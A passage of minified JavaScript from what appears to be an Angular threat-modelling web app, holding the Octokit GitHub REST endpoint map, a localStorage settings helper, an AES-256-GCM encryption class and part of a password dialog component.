/orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}/reactions/{reaction_id}"],listForCommitComment:["GET /repos/{owner}/{repo}/comments/{comment_id}/reactions"],listForIssue:["GET /repos/{owner}/{repo}/issues/{issue_number}/reactions"],listForIssueComment:["GET /repos/{owner}/{repo}/issues/comments/{comment_id}/reactions"],listForPullRequestReviewComment:["GET /repos/{owner}/{repo}/pulls/comments/{comment_id}/reactions"],listForRelease:["GET /repos/{owner}/{repo}/releases/{release_id}/reactions"],listForTeamDiscussionCommentInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}/reactions"],listForTeamDiscussionInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/reactions"]},repos:{acceptInvitation:["PATCH /user/repository_invitations/{invitation_id}",{},{renamed:["repos","acceptInvitationForAuthenticatedUser"]}],acceptInvitationForAuthenticatedUser:["PATCH /user/repository_invitations/{invitation_id}"],addAppAccessRestrictions:["POST /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/apps",{},{mapToData:"apps"}],addCollaborator:["PUT /repos/{owner}/{repo}/collaborators/{username}"],addStatusCheckContexts:["POST /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks/contexts",{},{mapToData:"contexts"}],addTeamAccessRestrictions:["POST /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/teams",{},{mapToData:"teams"}],addUserAccessRestrictions:["POST /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/users",{},{mapToData:"users"}],checkCollaborator:["GET /repos/{owner}/{repo}/collaborators/{username}"],checkVulnerabilityAlerts:["GET /repos/{owner}/{repo}/vulnerability-alerts"],codeownersErrors:["GET /repos/{owner}/{repo}/codeowners/errors"],compareCommits:["GET /repos/{owner}/{repo}/compare/{base}...{head}"],compareCommitsWithBasehead:["GET /repos/{owner}/{repo}/compare/{basehead}"],createAutolink:["POST /repos/{owner}/{repo}/autolinks"],createCommitComment:["POST /repos/{owner}/{repo}/commits/{commit_sha}/comments"],createCommitSignatureProtection:["POST /repos/{owner}/{repo}/branches/{branch}/protection/required_signatures"],createCommitStatus:["POST /repos/{owner}/{repo}/statuses/{sha}"],createDeployKey:["POST /repos/{owner}/{repo}/keys"],createDeployment:["POST /repos/{owner}/{repo}/deployments"],createDeploymentBranchPolicy:["POST /repos/{owner}/{repo}/environments/{environment_name}/deployment-branch-policies"],createDeploymentStatus:["POST /repos/{owner}/{repo}/deployments/{deployment_id}/statuses"],createDispatchEvent:["POST /repos/{owner}/{repo}/dispatches"],createForAuthenticatedUser:["POST /user/repos"],createFork:["POST /repos/{owner}/{repo}/forks"],createInOrg:["POST /orgs/{org}/repos"],createOrUpdateEnvironment:["PUT /repos/{owner}/{repo}/environments/{environment_name}"],createOrUpdateFileContents:["PUT /repos/{owner}/{repo}/contents/{path}"],createPagesDeployment:["POST /repos/{owner}/{repo}/pages/deployment"],createPagesSite:["POST /repos/{owner}/{repo}/pages"],createRelease:["POST /repos/{owner}/{repo}/releases"],createTagProtection:["POST /repos/{owner}/{repo}/tags/protection"],createUsingTemplate:["POST /repos/{template_owner}/{template_repo}/generate"],createWebhook:["POST /repos/{owner}/{repo}/hooks"],declineInvitation:["DELETE /user/repository_invitations/{invitation_id}",{},{renamed:["repos","declineInvitationForAuthenticatedUser"]}],declineInvitationForAuthenticatedUser:["DELETE /user/repository_invitations/{invitation_id}"],delete:["DELETE /repos/{owner}/{repo}"],deleteAccessRestrictions:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/restrictions"],deleteAdminBranchProtection:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/enforce_admins"],deleteAnEnvironment:["DELETE /repos/{owner}/{repo}/environments/{environment_name}"],deleteAutolink:["DELETE /repos/{owner}/{repo}/autolinks/{autolink_id}"],deleteBranchProtection:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection"],deleteCommitComment:["DELETE /repos/{owner}/{repo}/comments/{comment_id}"],deleteCommitSignatureProtection:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/required_signatures"],deleteDeployKey:["DELETE /repos/{owner}/{repo}/keys/{key_id}"],deleteDeployment:["DELETE /repos/{owner}/{repo}/deployments/{deployment_id}"],deleteDeploymentBranchPolicy:["DELETE /repos/{owner}/{repo}/environments/{environment_name}/deployment-branch-policies/{branch_policy_id}"],deleteFile:["DELETE /repos/{owner}/{repo}/contents/{path}"],deleteInvitation:["DELETE /repos/{owner}/{repo}/invitations/{invitation_id}"],deletePagesSite:["DELETE /repos/{owner}/{repo}/pages"],deletePullRequestReviewProtection:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/required_pull_request_reviews"],deleteRelease:["DELETE /repos/{owner}/{repo}/releases/{release_id}"],deleteReleaseAsset:["DELETE /repos/{owner}/{repo}/releases/assets/{asset_id}"],deleteTagProtection:["DELETE /repos/{owner}/{repo}/tags/protection/{tag_protection_id}"],deleteWebhook:["DELETE /repos/{owner}/{repo}/hooks/{hook_id}"],disableAutomatedSecurityFixes:["DELETE /repos/{owner}/{repo}/automated-security-fixes"],disableLfsForRepo:["DELETE /repos/{owner}/{repo}/lfs"],disableVulnerabilityAlerts:["DELETE /repos/{owner}/{repo}/vulnerability-alerts"],downloadArchive:["GET /repos/{owner}/{repo}/zipball/{ref}",{},{renamed:["repos","downloadZipballArchive"]}],downloadTarballArchive:["GET /repos/{owner}/{repo}/tarball/{ref}"],downloadZipballArchive:["GET /repos/{owner}/{repo}/zipball/{ref}"],enableAutomatedSecurityFixes:["PUT /repos/{owner}/{repo}/automated-security-fixes"],enableLfsForRepo:["PUT /repos/{owner}/{repo}/lfs"],enableVulnerabilityAlerts:["PUT /repos/{owner}/{repo}/vulnerability-alerts"],generateReleaseNotes:["POST /repos/{owner}/{repo}/releases/generate-notes"],get:["GET /repos/{owner}/{repo}"],getAccessRestrictions:["GET /repos/{owner}/{repo}/branches/{branch}/protection/restrictions"],getAdminBranchProtection:["GET /repos/{owner}/{repo}/branches/{branch}/protection/enforce_admins"],getAllEnvironments:["GET /repos/{owner}/{repo}/environments"],getAllStatusCheckContexts:["GET /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks/contexts"],getAllTopics:["GET /repos/{owner}/{repo}/topics"],getAppsWithAccessToProtectedBranch:["GET /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/apps"],getAutolink:["GET /repos/{owner}/{repo}/autolinks/{autolink_id}"],getBranch:["GET /repos/{owner}/{repo}/branches/{branch}"],getBranchProtection:["GET /repos/{owner}/{repo}/branches/{branch}/protection"],getClones:["GET /repos/{owner}/{repo}/traffic/clones"],getCodeFrequencyStats:["GET /repos/{owner}/{repo}/stats/code_frequency"],getCollaboratorPermissionLevel:["GET /repos/{owner}/{repo}/collaborators/{username}/permission"],getCombinedStatusForRef:["GET /repos/{owner}/{repo}/commits/{ref}/status"],getCommit:["GET /repos/{owner}/{repo}/commits/{ref}"],getCommitActivityStats:["GET /repos/{owner}/{repo}/stats/commit_activity"],getCommitComment:["GET /repos/{owner}/{repo}/comments/{comment_id}"],getCommitSignatureProtection:["GET /repos/{owner}/{repo}/branches/{branch}/protection/required_signatures"],getCommunityProfileMetrics:["GET /repos/{owner}/{repo}/community/profile"],getContent:["GET /repos/{owner}/{repo}/contents/{path}"],getContributorsStats:["GET /repos/{owner}/{repo}/stats/contributors"],getDeployKey:["GET /repos/{owner}/{repo}/keys/{key_id}"],getDeployment:["GET /repos/{owner}/{repo}/deployments/{deployment_id}"],getDeploymentBranchPolicy:["GET /repos/{owner}/{repo}/environments/{environment_name}/deployment-branch-policies/{branch_policy_id}"],getDeploymentStatus:["GET /repos/{owner}/{repo}/deployments/{deployment_id}/statuses/{status_id}"],getEnvironment:["GET /repos/{owner}/{repo}/environments/{environment_name}"],getLatestPagesBuild:["GET /repos/{owner}/{repo}/pages/builds/latest"],getLatestRelease:["GET /repos/{owner}/{repo}/releases/latest"],getPages:["GET /repos/{owner}/{repo}/pages"],getPagesBuild:["GET /repos/{owner}/{repo}/pages/builds/{build_id}"],getPagesHealthCheck:["GET /repos/{owner}/{repo}/pages/health"],getParticipationStats:["GET /repos/{owner}/{repo}/stats/participation"],getPullRequestReviewProtection:["GET /repos/{owner}/{repo}/branches/{branch}/protection/required_pull_request_reviews"],getPunchCardStats:["GET /repos/{owner}/{repo}/stats/punch_card"],getReadme:["GET /repos/{owner}/{repo}/readme"],getReadmeInDirectory:["GET /repos/{owner}/{repo}/readme/{dir}"],getRelease:["GET /repos/{owner}/{repo}/releases/{release_id}"],getReleaseAsset:["GET /repos/{owner}/{repo}/releases/assets/{asset_id}"],getReleaseByTag:["GET /repos/{owner}/{repo}/releases/tags/{tag}"],getStatusChecksProtection:["GET /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks"],getTeamsWithAccessToProtectedBranch:["GET /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/teams"],getTopPaths:["GET /repos/{owner}/{repo}/traffic/popular/paths"],getTopReferrers:["GET /repos/{owner}/{repo}/traffic/popular/referrers"],getUsersWithAccessToProtectedBranch:["GET /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/users"],getViews:["GET /repos/{owner}/{repo}/traffic/views"],getWebhook:["GET /repos/{owner}/{repo}/hooks/{hook_id}"],getWebhookConfigForRepo:["GET /repos/{owner}/{repo}/hooks/{hook_id}/config"],getWebhookDelivery:["GET /repos/{owner}/{repo}/hooks/{hook_id}/deliveries/{delivery_id}"],listAutolinks:["GET /repos/{owner}/{repo}/autolinks"],listBranches:["GET /repos/{owner}/{repo}/branches"],listBranchesForHeadCommit:["GET /repos/{owner}/{repo}/commits/{commit_sha}/branches-where-head"],listCollaborators:["GET /repos/{owner}/{repo}/collaborators"],listCommentsForCommit:["GET /repos/{owner}/{repo}/commits/{commit_sha}/comments"],listCommitCommentsForRepo:["GET /repos/{owner}/{repo}/comments"],listCommitStatusesForRef:["GET /repos/{owner}/{repo}/commits/{ref}/statuses"],listCommits:["GET /repos/{owner}/{repo}/commits"],listContributors:["GET /repos/{owner}/{repo}/contributors"],listDeployKeys:["GET /repos/{owner}/{repo}/keys"],listDeploymentBranchPolicies:["GET /repos/{owner}/{repo}/environments/{environment_name}/deployment-branch-policies"],listDeploymentStatuses:["GET /repos/{owner}/{repo}/deployments/{deployment_id}/statuses"],listDeployments:["GET /repos/{owner}/{repo}/deployments"],listForAuthenticatedUser:["GET /user/repos"],listForOrg:["GET /orgs/{org}/repos"],listForUser:["GET /users/{username}/repos"],listForks:["GET /repos/{owner}/{repo}/forks"],listInvitations:["GET /repos/{owner}/{repo}/invitations"],listInvitationsForAuthenticatedUser:["GET /user/repository_invitations"],listLanguages:["GET /repos/{owner}/{repo}/languages"],listPagesBuilds:["GET /repos/{owner}/{repo}/pages/builds"],listPublic:["GET /repositories"],listPullRequestsAssociatedWithCommit:["GET /repos/{owner}/{repo}/commits/{commit_sha}/pulls"],listReleaseAssets:["GET /repos/{owner}/{repo}/releases/{release_id}/assets"],listReleases:["GET /repos/{owner}/{repo}/releases"],listTagProtection:["GET /repos/{owner}/{repo}/tags/protection"],listTags:["GET /repos/{owner}/{repo}/tags"],listTeams:["GET /repos/{owner}/{repo}/teams"],listWebhookDeliveries:["GET /repos/{owner}/{repo}/hooks/{hook_id}/deliveries"],listWebhooks:["GET /repos/{owner}/{repo}/hooks"],merge:["POST /repos/{owner}/{repo}/merges"],mergeUpstream:["POST /repos/{owner}/{repo}/merge-upstream"],pingWebhook:["POST /repos/{owner}/{repo}/hooks/{hook_id}/pings"],redeliverWebhookDelivery:["POST /repos/{owner}/{repo}/hooks/{hook_id}/deliveries/{delivery_id}/attempts"],removeAppAccessRestrictions:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/apps",{},{mapToData:"apps"}],removeCollaborator:["DELETE /repos/{owner}/{repo}/collaborators/{username}"],removeStatusCheckContexts:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks/contexts",{},{mapToData:"contexts"}],removeStatusCheckProtection:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks"],removeTeamAccessRestrictions:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/teams",{},{mapToData:"teams"}],removeUserAccessRestrictions:["DELETE /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/users",{},{mapToData:"users"}],renameBranch:["POST /repos/{owner}/{repo}/branches/{branch}/rename"],replaceAllTopics:["PUT /repos/{owner}/{repo}/topics"],requestPagesBuild:["POST /repos/{owner}/{repo}/pages/builds"],setAdminBranchProtection:["POST /repos/{owner}/{repo}/branches/{branch}/protection/enforce_admins"],setAppAccessRestrictions:["PUT /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/apps",{},{mapToData:"apps"}],setStatusCheckContexts:["PUT /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks/contexts",{},{mapToData:"contexts"}],setTeamAccessRestrictions:["PUT /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/teams",{},{mapToData:"teams"}],setUserAccessRestrictions:["PUT /repos/{owner}/{repo}/branches/{branch}/protection/restrictions/users",{},{mapToData:"users"}],testPushWebhook:["POST /repos/{owner}/{repo}/hooks/{hook_id}/tests"],transfer:["POST /repos/{owner}/{repo}/transfer"],update:["PATCH /repos/{owner}/{repo}"],updateBranchProtection:["PUT /repos/{owner}/{repo}/branches/{branch}/protection"],updateCommitComment:["PATCH /repos/{owner}/{repo}/comments/{comment_id}"],updateDeploymentBranchPolicy:["PUT /repos/{owner}/{repo}/environments/{environment_name}/deployment-branch-policies/{branch_policy_id}"],updateInformationAboutPagesSite:["PUT /repos/{owner}/{repo}/pages"],updateInvitation:["PATCH /repos/{owner}/{repo}/invitations/{invitation_id}"],updatePullRequestReviewProtection:["PATCH /repos/{owner}/{repo}/branches/{branch}/protection/required_pull_request_reviews"],updateRelease:["PATCH /repos/{owner}/{repo}/releases/{release_id}"],updateReleaseAsset:["PATCH /repos/{owner}/{repo}/releases/assets/{asset_id}"],updateStatusCheckPotection:["PATCH /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks",{},{renamed:["repos","updateStatusCheckProtection"]}],updateStatusCheckProtection:["PATCH /repos/{owner}/{repo}/branches/{branch}/protection/required_status_checks"],updateWebhook:["PATCH /repos/{owner}/{repo}/hooks/{hook_id}"],updateWebhookConfigForRepo:["PATCH /repos/{owner}/{repo}/hooks/{hook_id}/config"],uploadReleaseAsset:["POST /repos/{owner}/{repo}/releases/{release_id}/assets{?name,label}",{baseUrl:"https://uploads.github.com"}]},search:{code:["GET /search/code"],commits:["GET /search/commits"],issuesAndPullRequests:["GET /search/issues"],labels:["GET /search/labels"],repos:["GET /search/repositories"],topics:["GET /search/topics"],users:["GET /search/users"]},secretScanning:{getAlert:["GET /repos/{owner}/{repo}/secret-scanning/alerts/{alert_number}"],listAlertsForEnterprise:["GET /enterprises/{enterprise}/secret-scanning/alerts"],listAlertsForOrg:["GET /orgs/{org}/secret-scanning/alerts"],listAlertsForRepo:["GET /repos/{owner}/{repo}/secret-scanning/alerts"],listLocationsForAlert:["GET /repos/{owner}/{repo}/secret-scanning/alerts/{alert_number}/locations"],updateAlert:["PATCH /repos/{owner}/{repo}/secret-scanning/alerts/{alert_number}"]},teams:{addOrUpdateMembershipForUserInOrg:["PUT /orgs/{org}/teams/{team_slug}/memberships/{username}"],addOrUpdateProjectPermissionsInOrg:["PUT /orgs/{org}/teams/{team_slug}/projects/{project_id}"],addOrUpdateRepoPermissionsInOrg:["PUT /orgs/{org}/teams/{team_slug}/repos/{owner}/{repo}"],checkPermissionsForProjectInOrg:["GET /orgs/{org}/teams/{team_slug}/projects/{project_id}"],checkPermissionsForRepoInOrg:["GET /orgs/{org}/teams/{team_slug}/repos/{owner}/{repo}"],create:["POST /orgs/{org}/teams"],createDiscussionCommentInOrg:["POST /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments"],createDiscussionInOrg:["POST /orgs/{org}/teams/{team_slug}/discussions"],deleteDiscussionCommentInOrg:["DELETE /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}"],deleteDiscussionInOrg:["DELETE /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}"],deleteInOrg:["DELETE /orgs/{org}/teams/{team_slug}"],getByName:["GET /orgs/{org}/teams/{team_slug}"],getDiscussionCommentInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}"],getDiscussionInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}"],getMembershipForUserInOrg:["GET /orgs/{org}/teams/{team_slug}/memberships/{username}"],list:["GET /orgs/{org}/teams"],listChildInOrg:["GET /orgs/{org}/teams/{team_slug}/teams"],listDiscussionCommentsInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments"],listDiscussionsInOrg:["GET /orgs/{org}/teams/{team_slug}/discussions"],listForAuthenticatedUser:["GET /user/teams"],listMembersInOrg:["GET /orgs/{org}/teams/{team_slug}/members"],listPendingInvitationsInOrg:["GET /orgs/{org}/teams/{team_slug}/invitations"],listProjectsInOrg:["GET /orgs/{org}/teams/{team_slug}/projects"],listReposInOrg:["GET /orgs/{org}/teams/{team_slug}/repos"],removeMembershipForUserInOrg:["DELETE /orgs/{org}/teams/{team_slug}/memberships/{username}"],removeProjectInOrg:["DELETE /orgs/{org}/teams/{team_slug}/projects/{project_id}"],removeRepoInOrg:["DELETE /orgs/{org}/teams/{team_slug}/repos/{owner}/{repo}"],updateDiscussionCommentInOrg:["PATCH /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}/comments/{comment_number}"],updateDiscussionInOrg:["PATCH /orgs/{org}/teams/{team_slug}/discussions/{discussion_number}"],updateInOrg:["PATCH /orgs/{org}/teams/{team_slug}"]},users:{addEmailForAuthenticated:["POST /user/emails",{},{renamed:["users","addEmailForAuthenticatedUser"]}],addEmailForAuthenticatedUser:["POST /user/emails"],block:["PUT /user/blocks/{username}"],checkBlocked:["GET /user/blocks/{username}"],checkFollowingForUser:["GET /users/{username}/following/{target_user}"],checkPersonIsFollowedByAuthenticated:["GET /user/following/{username}"],createGpgKeyForAuthenticated:["POST /user/gpg_keys",{},{renamed:["users","createGpgKeyForAuthenticatedUser"]}],createGpgKeyForAuthenticatedUser:["POST /user/gpg_keys"],createPublicSshKeyForAuthenticated:["POST /user/keys",{},{renamed:["users","createPublicSshKeyForAuthenticatedUser"]}],createPublicSshKeyForAuthenticatedUser:["POST /user/keys"],createSshSigningKeyForAuthenticatedUser:["POST /user/ssh_signing_keys"],deleteEmailForAuthenticated:["DELETE /user/emails",{},{renamed:["users","deleteEmailForAuthenticatedUser"]}],deleteEmailForAuthenticatedUser:["DELETE /user/emails"],deleteGpgKeyForAuthenticated:["DELETE /user/gpg_keys/{gpg_key_id}",{},{renamed:["users","deleteGpgKeyForAuthenticatedUser"]}],deleteGpgKeyForAuthenticatedUser:["DELETE /user/gpg_keys/{gpg_key_id}"],deletePublicSshKeyForAuthenticated:["DELETE /user/keys/{key_id}",{},{renamed:["users","deletePublicSshKeyForAuthenticatedUser"]}],deletePublicSshKeyForAuthenticatedUser:["DELETE /user/keys/{key_id}"],deleteSshSigningKeyForAuthenticatedUser:["DELETE /user/ssh_signing_keys/{ssh_signing_key_id}"],follow:["PUT /user/following/{username}"],getAuthenticated:["GET /user"],getByUsername:["GET /users/{username}"],getContextForUser:["GET /users/{username}/hovercard"],getGpgKeyForAuthenticated:["GET /user/gpg_keys/{gpg_key_id}",{},{renamed:["users","getGpgKeyForAuthenticatedUser"]}],getGpgKeyForAuthenticatedUser:["GET /user/gpg_keys/{gpg_key_id}"],getPublicSshKeyForAuthenticated:["GET /user/keys/{key_id}",{},{renamed:["users","getPublicSshKeyForAuthenticatedUser"]}],getPublicSshKeyForAuthenticatedUser:["GET /user/keys/{key_id}"],getSshSigningKeyForAuthenticatedUser:["GET /user/ssh_signing_keys/{ssh_signing_key_id}"],list:["GET /users"],listBlockedByAuthenticated:["GET /user/blocks",{},{renamed:["users","listBlockedByAuthenticatedUser"]}],listBlockedByAuthenticatedUser:["GET /user/blocks"],listEmailsForAuthenticated:["GET /user/emails",{},{renamed:["users","listEmailsForAuthenticatedUser"]}],listEmailsForAuthenticatedUser:["GET /user/emails"],listFollowedByAuthenticated:["GET /user/following",{},{renamed:["users","listFollowedByAuthenticatedUser"]}],listFollowedByAuthenticatedUser:["GET /user/following"],listFollowersForAuthenticatedUser:["GET /user/followers"],listFollowersForUser:["GET /users/{username}/followers"],listFollowingForUser:["GET /users/{username}/following"],listGpgKeysForAuthenticated:["GET /user/gpg_keys",{},{renamed:["users","listGpgKeysForAuthenticatedUser"]}],listGpgKeysForAuthenticatedUser:["GET /user/gpg_keys"],listGpgKeysForUser:["GET /users/{username}/gpg_keys"],listPublicEmailsForAuthenticated:["GET /user/public_emails",{},{renamed:["users","listPublicEmailsForAuthenticatedUser"]}],listPublicEmailsForAuthenticatedUser:["GET /user/public_emails"],listPublicKeysForUser:["GET /users/{username}/keys"],listPublicSshKeysForAuthenticated:["GET /user/keys",{},{renamed:["users","listPublicSshKeysForAuthenticatedUser"]}],listPublicSshKeysForAuthenticatedUser:["GET /user/keys"],listSshSigningKeysForAuthenticatedUser:["GET /user/ssh_signing_keys"],listSshSigningKeysForUser:["GET /users/{username}/ssh_signing_keys"],setPrimaryEmailVisibilityForAuthenticated:["PATCH /user/email/visibility",{},{renamed:["users","setPrimaryEmailVisibilityForAuthenticatedUser"]}],setPrimaryEmailVisibilityForAuthenticatedUser:["PATCH /user/email/visibility"],unblock:["DELETE /user/blocks/{username}"],unfollow:["DELETE /user/following/{username}"],updateAuthenticated:["PATCH /user"]}};function rwe(t,a,e,i,n){const r=t.request.defaults(i);return Object.assign(function c(...d){let T=r.endpoint.merge(...d);if(n.mapToData)return T=Object.assign({},T,{data:T[n.mapToData],[n.mapToData]:void 0}),r(T);if(n.renamed){const[k,q]=n.renamed;t.log.warn(`octokit.${a}.${e}() has been renamed to octokit.${k}.${q}()`)}if(n.deprecated&&t.log.warn(n.deprecated),n.renamedParameters){const k=r.endpoint.merge(...d);for(const[q,Y]of Object.entries(n.renamedParameters))q in k&&(t.log.warn(`"${q}" parameter is deprecated for "octokit.${a}.${e}()". Use "${Y}" instead`),Y in k||(k[Y]=k[q]),delete k[q]);return r(k)}return r(...d)},r)}function hG(t){const a=function uG(t,a){const e={};for(const[i,n]of Object.entries(a))for(const[r,c]of Object.entries(n)){const[d,T,k]=c,[q,Y]=d.split(/ /),te=Object.assign({method:q,url:Y},T);e[i]||(e[i]={});e[i][r]=k?rwe(t,i,r,te,k):t.request.defaults(te)}return e}(t,dG);return L7(ZT({},a),{rest:a})}hG.VERSION="6.8.1";const Rl=p5.plugin(rG,hG,lG).defaults({userAgent:"octokit-rest.js/19.0.5"});var si=(()=>{return(t=si||(si={})).AUTH_KEEP_SIGNED_IN="keep_signed_in",t.AUTH_ACCESS_TOKEN="auth_access_token",t.AUTH_GUEST="auth_guest",t.AUTH_LAST_CODE="auth_last_code",t.COOKIE_CONSENT="cookie_consent",t.CURRENT_VERSION="current_verison",t.CVE_SEARCH_HISTORY="cve_search_history",t.DARK_MODE="dark_mode",t.DIALOG_WARNING_CONSENT="dialog_warning_consent",t.GH_ACCOUNT_NAME="github_account_name",t.GH_USER_NAME="github_user_name",t.GH_USER_URL="github_user_url",t.GH_USER_EMAIL="github_user_email",t.LANGUAGE="language",t.LAST_FILE="last_project",t.MSG_SHOW_ERROR="msg_show_error",t.MSG_SHOW_WARNING="msg_show_warning",t.MSG_SHOW_SUCCESS="msg_show_success",t.MSG_SHOW_INFO="msg_show_info",t.MSG_SHOW_UNSAVED_CHANGED="msg_show_unsaved_changes",t.PAGE_CONFIG_TAB_INDEX="page_config_tab_index",t.PAGE_CONFIG_SPLIT_SIZE_1="page_config_split_size_1",t.PAGE_CONFIG_CHECKLISTS_TAB_INDEX="page_config_checklists_tab_index",t.PAGE_CONFIG_CHECKLISTS_SPLIT_SIZE_X="page_config_checklists_split_size_",t.PAGE_CONFIG_COMPONENTS_TAB_INDEX="page_config_components_tab_index",t.PAGE_CONFIG_STENCILS_TAB_INDEX="page_config_stencils_tab_index",t.PAGE_DASHBOARD_SPLIT_SIZE_X="page_dashboard_split_size_",t.PAGE_MITIGATION_SPLIT_SIZE_X="page_mitigation_split_size_",t.PAGE_MODELING_SPLIT_SIZE_X="page_modeling_split_size_",t.PAGE_MODELING_ASSETS_SPLIT_SIZE_X="page_modeling_assets_split_size_",t.PAGE_MODELING_ASSETS_TAB_INDEX="page_modeling_assets_tab_index",t.PAGE_MODELING_CONTAINERTREE_KEEP_STRUC="page_modeling_containertree_keep_struc",t.PAGE_MODELING_CONTAINERTREE_SHOW_SCEN="page_modeling_containertree_show_scen",t.PAGE_MODELING_CONTAINERTREE_SHOW_MEAS="page_modeling_containertree_show_meas",t.PAGE_MODELING_DIAGRAM_ANCHOR_COUNT="page_modeling_diagram_anchor_count",t.PAGE_MODELING_DIAGRAM_ARROW_BEND="page_modeling_diagram_arrow_bend",t.PAGE_MODELING_DIAGRAM_ARROW_NAME="page_modeling_diagram_arrow_name",t.PAGE_MODELING_DIAGRAM_ARROW_POS="page_modeling_diagram_arrow_pos",t.PAGE_MODELING_DIAGRAM_SHOW_GRID="page_modeling_diagram_show_grid",t.PAGE_MODELING_DIAGRAM_STICK_GRID="page_modeling_diagram_stick_grid",t.PAGE_MODELING_DIAGRAM_TEXTSIZE_INDEX="page_modeling_diagram_textsize_index",t.PAGE_MODELING_DIAGRAM_ZOOM="page_modeling_diagram_zoom",t.PAGE_MODELING_MODEL_TAB_INDEX="page_modeling_model_tab_index",t.PAGE_MODELING_THREAT_IDENT_TAB_INDEX="page_modeling_threat_ident_tab_index",t.PAGE_REPORTING_DIAGRAM_SHOW_GRID="page_reporting_diagram_show_grid",t.PAGE_REPORTING_SHOW_CHARTS="page_reporting_show_charts",t.PAGE_REPORTING_SHOW_FIRST_STEPS="page_reporting_show_first_steps",t.PAGE_REPORTING_SHOW_TEST_CASES="page_reporting_show_test_cases",t.PAGE_RISK_SPLIT_SIZE_X="page_risk_split_size_",t.FILE_HISTORY="project_history",t.SPELL_CHECK="spell_check",t.WELCOME_TOUR_STARTED="welcome_tour_started",si;var t})();let _r=(()=>{class t{Set(e,i){localStorage.setItem(e,i)}Get(e){return localStorage.getItem(e)}Remove(e){localStorage.removeItem(e)}Clear(){localStorage.clear()}ResetLayout(){this.Remove(si.PAGE_CONFIG_SPLIT_SIZE_1);for(let e=0;e<5;e++)this.Remove(si.PAGE_CONFIG_CHECKLISTS_SPLIT_SIZE_X+e.toString()),this.Remove(si.PAGE_DASHBOARD_SPLIT_SIZE_X+e.toString()),this.Remove(si.PAGE_DASHBOARD_SPLIT_SIZE_X+e.toString()),this.Remove(si.PAGE_MITIGATION_SPLIT_SIZE_X+e.toString()),this.Remove(si.PAGE_MODELING_ASSETS_SPLIT_SIZE_X+e.toString())}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();var g2=de(882),g5=de(5449).Buffer;const fG="aes-256-gcm";class y5{constructor(a){this.secret=a}getKey(a){return g2.Sf(this.secret,a,1e5,32,"sha512")}GetRandom(a){return g2.O6(a)}Encrypt(a){const e=g2.O6(16),i=g2.O6(64),n=this.getKey(i),r=g2.CW(fG,n,e),c=g5.concat([r.update(String(a),"utf8"),r.final()]),d=r.getAuthTag();return g5.concat([i,e,d,c]).toString("base64")}Decrypt(a){const e=g5.from(String(a),"base64"),i=e.slice(0,64),n=e.slice(64,80),r=e.slice(80,96),c=e.slice(96),d=this.getKey(i),T=g2.G_(fG,d,n);return T.setAuthTag(r),T.update(c)+T.final("utf8")}}var gG=de(7313);function dwe(t,a){if(1&t&&(m(0,"div",9),s(1),u()),2&t){const e=B();C(1),ct("\n    ",e.data.file,"\n  ")}}let mwe=(()=>{class t{constructor(e,i){this.dialogRef=e,this.data=i,this.show=!1}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh),Ee(_p))},t.\u0275cmp=Wt({type:t,selectors:[["app-password-dialog"]],decls:32,vars:17,consts:[["mat-dialog-title",""],["mat-dialog-content",""],["style","margin-bottom: 10px;",4,"ngIf"],[2,"width","100%"],["matInput","",3,"type","ngModel","ngModelChange","keydown.enter"],["matSuffix","",3,"click"],["mat-dialog-actions","",2,"float","right"],["mat-button","","mat-dialog-close",""],["mat-button","",3,"mat-dialog-close"],[2,"margin-bottom","10px"]],template:function(e,i){1&e&&(m(0,"h1",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"div",1),s(5,"\n  "),ne(6,dwe,2,1,"div",2),s(7,"\n  "),m(8,"mat-form-field",3),s(9,"\n    "),m(10,"mat-label"),s(11),oe(12,"translate"),u(),s(13,"\n    "),m(14,"input",4),he("ngModelChange",function(r){return i.data.pw=r})("keydown.enter",function(){return i.dialogRef.close(!0)}),u(),s(15,"\n    "),m(16,"mat-icon",5),he("click",function(){return i.show=!i.show}),s(17),u(),s(18,"\n  "),u(),s(19,"\n"),u(),s(20,"\n"),m(21,"div",6),s(22,"\n  "),m(23,"button",7),s(24),oe(25,"translate"),u(),s(26,"\n  